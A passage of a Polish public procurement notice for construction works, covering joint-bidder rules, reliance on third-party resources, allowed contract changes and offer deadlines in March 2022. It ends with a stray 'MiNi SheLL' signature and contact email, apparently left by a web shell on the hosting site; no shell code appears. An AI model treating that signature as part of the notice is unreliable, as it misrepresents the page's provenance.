- według załączonego wzoru. 2) wykazu<br/>osób,skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych i uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami<br/>według załączonego wzoru.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia(możliwość<br/>składania jednej oferty przez dwa lub więcej podmiotów np. konsorcjum, spółkę cywilną) wraz z<br/>ofertą wykonawcy zobowiązani są złożyć pełnomocnictwo do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego.- nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. Dokument musi zostać złożony<br/>pod rygorem nieważności w formie elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym. Dopuszczalne jest również złożenie kopii dokumentu elektronicznie poświadczonej<br/>przez notariusza.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówieniadołączają do<br/>oferty oświadczenie (za pośrednictwem mini Portalu), z którego wynika, które roboty<br/>budowlane,dostawy lub usługi wykonają poszczególni wykonawcy – wzór oświadczenia stanowi<br/>załącznik nr2 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym. 4.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są na wezwanie<br/>Zamawiającego,złożyć podmiotowe środki dowodowe, o których mowa w pkt. 6 niniejszego<br/>Rozdziału , przy czym podmiotowe środki dowodowe, o których mowa:a) w pkt. 6 ppkt 2) SWZ<br/>składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku b) w<br/>pkt. 6ppkt 1) SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.Poleganie na zdolnościach podmiotów udostępniających zasoby.5. W przypadku<br/>gdy wykonawca, w celu potwierdzenia spełniania warunków udziału w postępowaniu,polega na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby wykonawca składa wraz z<br/>ofertą(za pośrednictwem miniPortalu) zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie,będzie<br/>dysponował niezbędnymi zasobami tych podmiotów – wzór oświadczenia stanowi załącznik nr<br/>3do SWZ.Zobowiązanie podmiotu udostępniającego zasoby,ma potwierdzać, że stosunek<br/>łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do<br/>tych zasobów i określa w szczególności:1) zakres dostępnych wykonawcy zasobów podmiotu<br/>udostępniającego zasoby,2) sposób i okres udostępniania wykonawcy i wykorzystania przez<br/>niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,3) czy i w<br/>jakim zakresie podmiot udostępniający, na zdolnościach którego wykonawca polega w<br/>odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,kwalifikacji<br/>zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane<br/>zdolności dotyczą.Zobowiązanie podmiotu trzeciego należy złożyć wformie elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym lubpostaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym. Dokumenty, w tym zobowiązanie podpisuje<br/>podmiot, od którego te dokumenty pochodzą, chyba, że zostanie udzielone Wykonawcy<br/>pełnomocnictwo do podpisania takich dokumentów za podmiot trzeci/podwykonawcę <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający na podstawie art 455 ust. 1 pkt 1 Pzp, przewiduje możliwość dokonania<br/>następujących zmian umowy:1.1. w zakresie dotyczącym zmiany sposobu wykonania przedmiotu umowy w przypadku:a). zmiany przepisów prawa powodujących konieczność zmiany<br/>materiałów budowlanych, urządzeń lub przyjęcia innych rozwiązań technicznych lub<br/>technologicznych, w szczególności robót zamiennych;b) zrealizowania przedmiotu umowy przy<br/>zastosowaniu innych materiałów lub rozwiązań technicznych lub technologicznych,w<br/>szczególności robót zamiennych, gdy wystąpi co najmniej jedna z okoliczności:(i) w<br/>sytuacjigdyby zastosowanie przewidzianych pierwotnie rozwiązań grozi niewykonaniem lub<br/>wadliwym wykonaniem przedmiotu umowy(ii) jak również w przypadku wystąpienia okoliczności,<br/>o których mowa w pkt (2) i (3) poniżej.1.2. w zakresie dotyczącym zmiany terminu wykonania<br/>przedmiotu umowy w przypadku:a) o czas opóźnienia Zamawiającego w wykonywaniu jego<br/>obowiązkówwynikających z umowy, w tym w szczególności w zakresie obowiązku wydania<br/>Terenu Budowy oraz obowiązku dokonania odbioru, gdyby odbiór taki w pierwotnie założonym<br/>terminie był utrudniony lub niemożliwy, jeżeli takie opóźnienie jest lub będzie miało wpływ na<br/>wykonanie przedmiotu umowy lub jakiejkolwiek jego części;b) z powodu siły wyższej np.: w<br/>przypadkuzaistnienia działań wojennych, aktów terroryzmu, rewolucji,przewrotu wojskowego lub<br/>cywilnego, wojny domowej, skażeń radioaktywnych, z wyjątkiem tych, które mogą być<br/>spowodowane użyciem ich przez Wykonawcę, zaistnienia klęski żywiołowej, jak<br/>huragany,powodzie, trzęsienie ziemi, bunty, niepokoje, strajki, okupacje budowy spowodowane<br/>przez osoby inne niż pracownicy Wykonawcy i jego podwykonawców, na walny<br/>deszcz,powódź,huragan, śnieżyca,uderzenia pioruna, gradobicie, epidemie, pożary, wojna,<br/>zamieszki krajowe, strajki, szkody wyrządzone przez dzikie zwierzęta, odnalezienie<br/>niewypałów,niewybuchów lub wykopalisk archeologicznych, katastrofy lotniczej oraz o czas<br/>niezbędny do usunięcia jej skutków i następstw;c) wstrzymanie budowy przez właściwy organ z<br/>przyczyn niezawinionych przez Wykonawcę np. odkrycie niewypałów i niewybuchów,<br/>zagrożenie wybuchem;d) będącym następstwem opóźnienia w działaniach organów<br/>administracji, z przyczyn nie zawinionych przez Wykonawcę w szczególności: przekroczenie<br/>zakreślonych przez prawo terminów wydania przez organy administracji map, uzgodnień, opinii,<br/>decyzji,zezwoleń, itp.;e) o czas opóźnienia w wykonaniu przez inne niż organy administracji<br/>podmioty zewnętrzne czynności koniecznych do wykonania Przedmiotu Umowy z<br/>zastrzeżeniem, że przyczyną opóźnienia nie są działania lubzaniechania Wykonawcy f) zlecenia<br/>wykonania zamiennych lub dodatkowych robót budowlanych, o ile wykonanie tych robót<br/>powoduje konieczność przedłużenia terminu wykonania robót objętych niniejszą umową.g) gdy<br/>wystąpi konieczność wykonania robót innych robót niezbędnych do wykonania przedmiotu<br/>Umowy ze względu na zasady wiedzy technicznej, którewstrzymują lub opóźniają realizację<br/>przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle<br/>prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub<br/>usunięcia tych kolizji.Zmiany w tym zakresie nie spowodują zwiększenia wynagrodzenia<br/>Wykonawcy,i) gdy wystąpią nie korzystne warunki atmosferyczne uniemożliwiające prawidłowe<br/>wykonanie robót, w szczególności z powodu technologii realizacji prac określonych umową,<br/>normami lub innymi przepisami, wymagającymi odpowiednich warunków, jeżeli konieczność<br/>wykonania prac w tym okresie nie jest następstwem okoliczności,za które Wykonawca ponosi<br/>odpowiedzialność. Reszta treści w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-29 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-28</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com